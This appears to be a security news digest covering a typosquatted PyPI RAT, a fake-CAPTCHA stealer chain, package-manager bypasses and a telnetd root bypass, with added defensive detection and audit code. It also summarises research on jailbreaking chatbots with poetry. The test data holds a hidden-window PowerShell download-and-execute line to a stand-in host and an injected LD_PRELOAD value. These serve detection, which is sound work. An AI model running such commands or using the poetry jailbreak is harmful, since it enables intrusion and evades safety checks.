Issues

Malicious PyPI Packages Spellcheckpy and Spellcheckerpy Deliver Python RAT

Two malicious PyPI packages, spellcheckpy and spellcheckerpy, typosquatted the legitimate pyspellchecker library. Each carried a base64-encoded payload that is decoded and executed when the package is imported; the first release shipped with that payload dormant, and a later version switched it on, so the package looked clean at upload time. The payload is a Python Remote Access Trojan (RAT) protected by two layers of XOR encryption, giving the operator remote control while frustrating static inspection, and it reports to a command-and-control server previously seen in other malicious campaigns. Overlaps with earlier attacks point to a recurring threat actor. Import-time execution is the detail defenders should note: a single import from a test run or a build step is enough to trigger it, with no function call required.

https://www.aikido.dev/blog/malicious-pypi-packages-spellcheckpy-and-spellcheckerpy-deliver-python-rat
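
An added example, not code from Aikido's post or from the packages themselves: a small AST scanner that finds the pattern the summary describes, a base64 blob decoded and handed to exec() at module level, and distinguishes it from the same call buried in a function that only runs when invoked. It also decodes literal blobs so an analyst can read stage two. The sample sources are constructed, and the DECODERS and EXECUTORS sets are the scanner's own assumptions about what to flag.

```python
"""Static check for import-time execution of a decoded payload in a Python package.

Added example for this digest, written against the behaviour the summary
describes; it is not code from Aikido's write-up or from the malicious
packages. The module sources at the bottom are constructed for the demo.
"""
import ast
import base64
from dataclasses import dataclass

DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode", "unhexlify"}
EXECUTORS = {"exec", "eval"}


@dataclass
class Finding:
    lineno: int
    reason: str
    at_import: bool  # True when the call runs as a side effect of 'import'


def _callee(node: ast.AST):
    """Bare name of the function being called: exec(...) -> 'exec', base64.b64decode(...) -> 'b64decode'."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return node.attr
    return None


def _uses_decoder(node: ast.AST) -> bool:
    return any(isinstance(n, ast.Call) and _callee(n.func) in DECODERS for n in ast.walk(node))


def scan_source(src: str) -> list:
    """Return Findings for exec/eval of decoded or non-literal data, noting whether each runs on import."""
    tree = ast.parse(src)
    tainted = set()   # names assigned from a decoder call, e.g. _c = base64.b64decode(...)
    findings = []

    def visit(node: ast.AST, in_func: bool) -> None:
        for child in ast.iter_child_nodes(node):
            if isinstance(child, ast.Assign) and _uses_decoder(child.value):
                tainted.update(t.id for t in child.targets if isinstance(t, ast.Name))
            if isinstance(child, ast.Call) and _callee(child.func) in EXECUTORS and child.args:
                arg = child.args[0]
                fn = _callee(child.func)
                if _uses_decoder(arg) or (isinstance(arg, ast.Name) and arg.id in tainted):
                    findings.append(Finding(child.lineno, f"{fn}() runs a decoded payload", not in_func))
                elif not (isinstance(arg, ast.Constant) and isinstance(arg.value, str)):
                    findings.append(Finding(child.lineno, f"{fn}() on a non-literal argument", not in_func))
            # Bodies of def/lambda only run when called, so anything inside them is not import-time.
            nested = in_func or isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda))
            visit(child, nested)

    visit(tree, False)
    return findings


def recover_literal_payloads(src: str) -> list:
    """Decode base64 literals passed straight to b64decode so an analyst can read stage two."""
    out = []
    for n in ast.walk(ast.parse(src)):
        if isinstance(n, ast.Call) and _callee(n.func) == "b64decode" and n.args:
            arg = n.args[0]
            if isinstance(arg, ast.Constant) and isinstance(arg.value, (str, bytes)):
                try:
                    out.append(base64.b64decode(arg.value, validate=True))
                except ValueError:
                    pass
    return out


# Constructed samples. STAGE stands in for the RAT; it is a harmless print.
STAGE = b"print('stage two would run here')"
BLOB = base64.b64encode(STAGE).decode()

BENIGN = '''
import base64
def decode_token(tok):
    return base64.b64decode(tok)
'''
SUSPECT = f'''
import base64
_c = base64.b64decode("{BLOB}")
exec(_c)
'''
LAZY = f'''
import base64
def activate():
    exec(base64.b64decode("{BLOB}"))
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspect", SUSPECT), ("lazy", LAZY)):
        for f in scan_source(src):
            when = "at import" if f.at_import else "on call"
            print(f"{label}: line {f.lineno}: {f.reason} ({when})")
    for payload in recover_literal_payloads(SUSPECT):
        print("recovered:", payload.decode())
```

Run it against a package's __init__.py, setup.py and anything they import. Obfuscated packages often split the blob across constants or alias the decoder, so this catches the straightforward variant; a clean result means "nothing obvious", not clearance.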

FBI Seizes RAMP Cybercrime Forum Used by Ransomware Gangs

The FBI seized RAMP (Russian Anonymous Marketplace), a cybercrime forum used by ransomware gangs, and replaced its Tor and clearnet sites with a seizure notice. The action, coordinated with the Justice Department, gives investigators the forum's user data, which may identify members. RAMP launched in 2021 after other forums banned ransomware advertising, and was managed by Mikhail Matveev, who is linked to multiple ransomware operations. Forum operators lamented the loss; the seizure is part of continuing law-enforcement pressure on the ransomware ecosystem.

https://www.bleepingcomputer.com/news/security/fbi-seizes-ramp-cybercrime-forum-used-by-ransomware-gangs/

Hand CVE Over to the Private Sector

The Common Vulnerabilities and Exposures (CVE) program, created in 1999, is criticized by the author as redundant and mismanaged. Despite substantial government funding, MITRE's CVE program is portrayed as lacking objectivity, quick response, and expertise in running a vulnerability database; its high cost and slow turnaround, the author argues, fall short of what should be expected from a federally funded research and development center.

https://www.darkreading.com/cybersecurity-operations/hand-cve-over-to-private-sector

Stanley — a $6,000 Russian Malware Toolkit With Chrome Web Store Guarantee

Varonis Threat Labs describes "Stanley", a Russian malware toolkit sold for about $6,000 that packages site-spoofing phishing as a Chrome extension and comes with a "guarantee" that the extension will pass Chrome Web Store review. Operators push it aggressively through compromised email accounts and Chrome notification prompts. Once installed, the extension tracks the victim's browsing in detail, overlays phishing pages on legitimate sites, and falls back to a secondary protocol if its primary command-and-control channel is lost. Despite visible flaws, it works because a store-approved extension inherits the browser's trust and broad access to page content, and it will keep posing a risk until marketplace review and policies tighten.

https://www.varonis.com/blog/stanley-malware-kit

Have I Been Pwned: SoundCloud Data Breach Impacts 29.8 Million Accounts

SoundCloud suffered a data breach affecting 29.8 million accounts; the exposed data consists of email addresses and public profile information. The company confirmed the incident on December 15, 2025, after users reported access problems. Its investigation found no sensitive data was accessed, but the ShinyHunters group claimed responsibility and attempted to extort the company. Even without credentials, a clean list of 29.8 million verified addresses tied to a named service is phishing fuel, so expect SoundCloud-themed lures.

https://www.bleepingcomputer.com/news/security/have-i-been-pwned-soundcloud-data-breach-impacts-298-million-accounts/

Massive Credential Leak Exposes 149 Million Stolen Logins for Gmail, Facebook, Netflix and More

A leak of 149 million stolen logins, including credentials for Gmail, Facebook and Netflix, exposes how industrialized credential theft has become and puts customer trust at risk. The article frames the incident as a brand problem: companies must invest in stronger security, educate customers about the malware that harvests these credentials, and respond proactively to protect the customer experience. For practitioners it is a credential-stuffing signal: passwords reused across those services are the ones at risk, and phishing-resistant MFA is the control that blunts it.

https://www.cxtoday.com/security-privacy-compliance/massive-credential-leak-exposes-149-million-stolen-logins-for-gmail-facebook-netflix-and-more/

Novel Fake CAPTCHA Chain Delivering Amatera Stealer

Extreme TLDR: Blackpoint's SOC reports a Fake CAPTCHA campaign (the ClickFix pattern, where the victim is told to paste a clipboard-loaded command into the Run dialog) that delivers Amatera Stealer through a Microsoft-signed script, so the early stages run under legitimate Windows components and slip past signature-based tooling. Notable tactics: validating that a real user performed the expected interactions, pulling live configuration from a Google Calendar, and hiding the encrypted payload in PNG images (steganography). Each stage proceeds only when its conditions are met, so a sandbox or scanner that does not satisfy them never sees the next one.

Key Findings:
– Uses a Fake CAPTCHA lure and a Microsoft-signed LOLBin script.
– Validates user interactions and clipboard contents before proceeding.
– Pulls its configuration live from a Google Calendar.
– Delivers the encrypted payload inside PNG images.
– Executes the final payload, Amatera Stealer, using layered encryption and evasive networking.

Recommendations: restrict access to the Run dialog (a Group Policy setting covers this), remove App-V components that nothing on the host needs, educate users about the lure, enable PowerShell script block and module logging, and monitor for suspicious execution patterns, in particular script hosts spawned from explorer.exe with download-and-execute command lines.

https://blackpointcyber.com/blog/novel-fake-captcha-chain-delivering-amatera-stealer/
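
An added example, not Blackpoint's detection content: a scoring pass over process-creation events in a Sysmon-like shape that looks for the execution pattern behind this chain, a script host launched from explorer.exe (which is what the Run dialog produces) together with command-line indicators. The events are constructed; the indicator regexes are assumptions, and the App-V publishing script name is inferred from the report's App-V recommendation rather than quoted on this page.

```python
"""Triage process-creation events for the Fake CAPTCHA / ClickFix execution pattern.

Added example for this digest, not code from Blackpoint's report. The events
below are constructed in a Sysmon-like shape (parent image, image, command
line); the indicator list is a heuristic set assumed for the demo, and the
App-V script name is an assumption drawn from the report's App-V
recommendation, not a string quoted on this page.
"""
import re

# Script and LOLBin hosts a user could be talked into launching from the Run dialog.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "curl.exe", "bitsadmin.exe"}

# (pattern, label); each contributes at most one point per event.
INDICATORS = [
    (re.compile(r"(^|\s)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded PowerShell command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory expression evaluation"),
    (re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", re.I),
     "remote fetch"),
    (re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), "hidden window"),
    (re.compile(r"mshta(\.exe)?\s+https?://", re.I), "mshta loading remote HTA"),
    (re.compile(r"syncappvpublishingserver", re.I), "App-V publishing script (assumed LOLBin)"),
    (re.compile(r"(i am not a robot|captcha|verification id)", re.I), "CAPTCHA-lure text in command line"),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators_in(command_line: str) -> list:
    return [label for rx, label in INDICATORS if rx.search(command_line)]


def triage(events: list, threshold: int = 2) -> list:
    """Score each event: a script host spawned by explorer.exe (Run dialog, Start menu, double-click)
    is one point, each command-line indicator another. Launch-from-shell alone is common and
    benign, which is why the default threshold needs at least one indicator on top."""
    flagged = []
    for ev in events:
        reasons = []
        if basename(ev["parent_image"]) == "explorer.exe" and basename(ev["image"]) in SCRIPT_HOSTS:
            reasons.append("script host launched from explorer.exe")
        reasons.extend(indicators_in(ev["command_line"]))
        if len(reasons) >= threshold:
            flagged.append({"pid": ev["pid"], "image": basename(ev["image"]),
                            "score": len(reasons), "reasons": reasons})
    return flagged


# Constructed events. example.invalid is a reserved, never-resolving domain.
EVENTS = [
    {"pid": 4412, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/v)" '
                     '# I am not a robot - reCAPTCHA Verification ID: 7811'},
    {"pid": 4420, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
    {"pid": 4431, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(f"pid {hit['pid']} {hit['image']} score={hit['score']}: " + "; ".join(hit["reasons"]))
```

The threshold is the point: explorer.exe as parent is not suspicious on its own (a Start menu launch looks identical), so the rule demands at least one indicator on top, and the admin's Get-Date session scores one and is left alone. Feed it Sysmon Event ID 1 or Security 4688 records mapped to the three fields, and add -EncodedCommand decoding and grandparent context before trusting it in production.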

PackageGate: 6 Zero-Days in JS Package Managers But NPM Won’t Act

Koi reports six zero-day flaws in the defenses JavaScript package managers (npm, pnpm, vlt and Bun) rely on against Shai-Hulud-style worms: install-script blocking and lockfile integrity checks can both be bypassed, undercutting the tools' security claims. pnpm, vlt and Bun fixed their issues promptly; npm declined to act. Koi's advice to organizations: stay vigilant, keep using lockfiles and disabled install scripts (they still raise the bar, but treat them as a layer rather than a guarantee), and consider moving to a package manager that fixed its share.

https://www.koi.ai/blog/packagegate-6-zero-days-in-js-package-managers-but-npm-wont-act
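
An added example, not Koi's code or any package manager's: an audit over package-lock.json (lockfile v2/v3) that lists which installed dependencies declare install-time scripts (the hasInstallScript field), which were resolved from somewhere other than the registry, and which lack a sha512 integrity hash. The lockfile is constructed with placeholder names and digests; TRUSTED_HOSTS is an assumption to widen for a private mirror.

```python
"""Audit an npm lockfile (v2/v3) for the two things the advice above leans on:
install-time scripts and integrity-pinned, registry-sourced resolution.

Added example for this digest, not code from Koi's post or any package
manager. LOCK below is a constructed package-lock.json; package names and
integrity values are placeholders. 'hasInstallScript', 'resolved' and
'integrity' are real lockfile fields; TRUSTED_HOSTS is an assumption to
adjust for a private mirror.
"""
import json
from urllib.parse import urlparse

TRUSTED_HOSTS = {"registry.npmjs.org"}


def audit_lockfile(lock_text: str, trusted_hosts=TRUSTED_HOSTS) -> list:
    """Return (name, version, [problems]) for every dependency that needs review."""
    lock = json.loads(lock_text)
    if lock.get("lockfileVersion", 1) < 2:
        raise ValueError("lockfileVersion 1 has no 'packages' map; regenerate with npm 7 or newer")
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if path == "" or meta.get("link"):          # root project entry / workspace symlink
            continue
        name = path.rsplit("node_modules/", 1)[-1]   # handles nested and @scoped paths
        problems = []
        if meta.get("hasInstallScript"):
            problems.append("declares an install-time lifecycle script")
        resolved = meta.get("resolved")
        if not resolved:
            problems.append("no resolved URL recorded")
        else:
            url = urlparse(resolved)
            if url.scheme != "https" or url.hostname not in trusted_hosts:
                problems.append(f"resolved outside the trusted registry: {resolved}")
        if not str(meta.get("integrity", "")).startswith("sha512-"):
            problems.append("integrity hash missing or weaker than sha512")
        if problems:
            findings.append((name, meta.get("version"), problems))
    return findings


# Constructed lockfile. The digest strings are length-correct placeholders, not real hashes.
_FAKE_SHA512 = "sha512-" + "A" * 86 + "=="
LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3, "requires": True,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"alpha-lib": "^1.0.0", "native-bindings": "^0.4.0"}},
        "node_modules/alpha-lib": {
            "version": "1.0.3",
            "resolved": "https://registry.npmjs.org/alpha-lib/-/alpha-lib-1.0.3.tgz",
            "integrity": _FAKE_SHA512},
        "node_modules/native-bindings": {
            "version": "0.4.1",
            "resolved": "https://registry.npmjs.org/native-bindings/-/native-bindings-0.4.1.tgz",
            "integrity": _FAKE_SHA512, "hasInstallScript": True},
        "node_modules/native-bindings/node_modules/sketchy-util": {
            "version": "2.0.0",
            "resolved": "http://cdn.example.invalid/sketchy-util-2.0.0.tgz",
            "integrity": "sha1-" + "B" * 27 + "="},
    },
})

if __name__ == "__main__":
    for name, version, problems in audit_lockfile(LOCK):
        print(f"{name}@{version}")
        for p in problems:
            print("  -", p)
```

Because the reported flaws sit inside the tools' own enforcement of ignore-scripts and lockfile checks, a review of what the lockfile actually recorded is a second opinion that does not depend on that enforcement. Run it in CI against the committed lockfile and fail on hasInstallScript entries nobody approved; the lockfile is itself an input an attacker may tamper with, so pair it with review of lockfile diffs.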

Nearly 800,000 Telnet Servers Exposed to Remote Attacks

Nearly 800,000 Internet-exposed Telnet servers are within reach of attackers exploiting an authentication bypass (CVE-2026-24061) in GNU InetUtils telnetd that lets an unauthenticated remote attacker obtain root. Versions 1.9.3 through 2.7 are affected; 2.8 fixes it. GreyNoise reports limited exploitation attempts since disclosure. Not every exposed Telnet daemon is InetUtils, so the count is an upper bound on exposure rather than a tally of vulnerable hosts. Admins who cannot upgrade immediately should disable Telnet or block TCP port 23 at the edge.

https://www.bleepingcomputer.com/news/security/nearly-800-000-telnet-servers-exposed-to-remote-attacks/

AI Jailbreaking Via Poetry: Bypassing Chatbot Defenses With Rhyme

Researchers found that restyling a request as poetry substantially weakens language models' safety guardrails. Testing 25 popular models, they measured that poetic prompts raised the likelihood of unsafe responses by an average of 35% compared with the same requests in prose; Google's Gemini 1.5 Pro was the most susceptible, with poetic prompts bypassing its restrictions 100% of the time. For anyone deploying LLM guardrails the lesson is that refusal behaviour keyed to the surface form of a request does not carry over to stylistic transformations, so red-team evaluations need paraphrase and style attacks, not only direct prompts.

https://www.kaspersky.com/blog/poetry-ai-jailbreak/55171/

Hackers Exploit Critical Telnetd Auth Bypass Flaw to Get Root

Attackers are exploiting a critical, 11-year-old authentication bypass in the GNU InetUtils telnetd server to obtain root remotely. The bug lies in how telnetd hands client-supplied environment variables to the login program without sanitizing them: a client that sets the USER variable can influence how login is invoked and skip authentication. Versions 1.9.3 through 2.7 are affected; 2.8 has the fix. Telnet lingers on many legacy systems, particularly in industrial environments. Exploit attempts have been observed, though real-world impact appears limited so far. Patch immediately, or disable telnetd and block TCP port 23 where patching is not possible.

https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-telnetd-auth-bypass-flaw-to-get-root/
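
An added example covering both telnetd items above, not InetUtils code and not a reproduction of CVE-2026-24061: a model of the flaw class, a client-supplied environment value that reaches the argv of a privileged login helper unsanitized, beside the hardened handling, an allowlist of variable names with a shape check per value. The exact command line telnetd builds is not described on this page, so the argv layout, LOGIN_PATH and the allowlist are assumptions.

```python
"""Model of the flaw class behind the telnetd bypass: client-supplied environment
values flowing unsanitized into the invocation of a privileged login helper.

Added example for this digest, not InetUtils code and not a reproduction of
CVE-2026-24061; the exact way telnetd builds the login command line is not
described on this page, so the argv shape here is a model. LOGIN_PATH and the
allowlist are assumptions.
"""
import re

LOGIN_PATH = "/bin/login"

# Variables a Telnet NEW-ENVIRON client may legitimately ask to pass, with the shape each must have.
ALLOWED_ENV = {
    "USER": re.compile(r"^[a-z_][a-z0-9_-]{0,31}$"),           # POSIX portable username; never starts with '-'
    "TERM": re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$"),
    "DISPLAY": re.compile(r"^[A-Za-z0-9._-]*:[0-9]+(\.[0-9]+)?$"),
}


class RejectedEnvironment(ValueError):
    """Raised when a client-supplied variable is not allowlisted or fails its shape check."""


def login_argv_unsanitized(client_env: dict, peer: str) -> list:
    """The hazardous pattern: USER is appended to the login argv exactly as the client sent it,
    so a value beginning with '-' reaches login's option parser instead of its username slot."""
    argv = [LOGIN_PATH, "-h", peer, "-p"]
    if "USER" in client_env:
        argv.append(client_env["USER"])
    return argv


def sanitize_client_env(client_env: dict) -> dict:
    """Allowlist by name and validate by shape; anything else (PATH, LD_*, option-shaped USER) is rejected.
    Rejecting rather than silently dropping keeps the failure visible in logs."""
    clean = {}
    for name, value in client_env.items():
        shape = ALLOWED_ENV.get(name)
        if shape is None:
            raise RejectedEnvironment(f"variable not permitted: {name}")
        if not shape.match(value):
            raise RejectedEnvironment(f"malformed value for {name}: {value!r}")
        clean[name] = value
    return clean


def login_argv_hardened(client_env: dict, peer: str) -> list:
    """Same argv, but built only from an environment that passed sanitize_client_env()."""
    env = sanitize_client_env(client_env)
    argv = [LOGIN_PATH, "-h", peer, "-p"]
    if "USER" in env:
        argv.append(env["USER"])
    return argv


if __name__ == "__main__":
    hostile = {"USER": "--option-shaped", "LD_PRELOAD": "/tmp/evil.so"}   # constructed client request
    print("unsanitized:", login_argv_unsanitized(hostile, "198.51.100.7"))
    try:
        login_argv_hardened(hostile, "198.51.100.7")
    except RejectedEnvironment as e:
        print("hardened:", e)
    print("hardened ok:", login_argv_hardened({"USER": "alice", "TERM": "xterm-256color"}, "198.51.100.7"))
```

The defender's check is the username regex: a POSIX portable username cannot begin with '-', so an option-shaped value is rejected before anything downstream can misread it as a flag. The same trust boundary is where LD_* and PATH from a remote client should die, which is why the allowlist is by name as well as by shape.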

Microsoft Gave FBI Keys To Unlock Encrypted Data, Exposing Major Privacy Flaw

Microsoft gave the FBI the keys needed to unlock BitLocker-protected data on three laptops, in response to a warrant in a Covid unemployment-assistance fraud investigation in Guam. It is the first known instance of Microsoft handing encryption keys to law enforcement. Privacy experts argue the decision compromises user privacy and security and urge Microsoft to adopt stronger protections like those offered by Apple and Google. The practical point for defenders: Microsoft can only surrender keys it holds, which is the situation when a BitLocker recovery key is backed up to a Microsoft account, the default when device encryption is turned on under a consumer Microsoft sign-in. Organizations that escrow recovery keys to their own on-premises Active Directory, or keep them offline, do not have this exposure.

https://www.forbes.com/sites/thomasbrewster/2026/01/22/microsoft-gave-fbi-keys-to-unlock-bitlocker-encrypted-data/

NIST Is Rethinking Its Role in Analyzing Software Vulnerabilities

NIST is revising how it analyzes software vulnerabilities because CVE submissions now outrun its capacity to enrich them. It plans to prioritize a subset of vulnerabilities for in-depth analysis and may hand enrichment work to outside organizations. A strategic review is meant to clarify NIST's role, emphasizing collaboration with partners while keeping operational work aligned with its research mission. For consumers of the National Vulnerability Database this could amount to a substantial reset in how, and how quickly, CVEs receive CVSS scores, CPE names and CWE tags, so tooling that blocks on NVD enrichment should not assume it will arrive for every entry.

https://www.cybersecuritydive.com/news/nist-cve-vulnerability-analysis-nvd-review/810300/
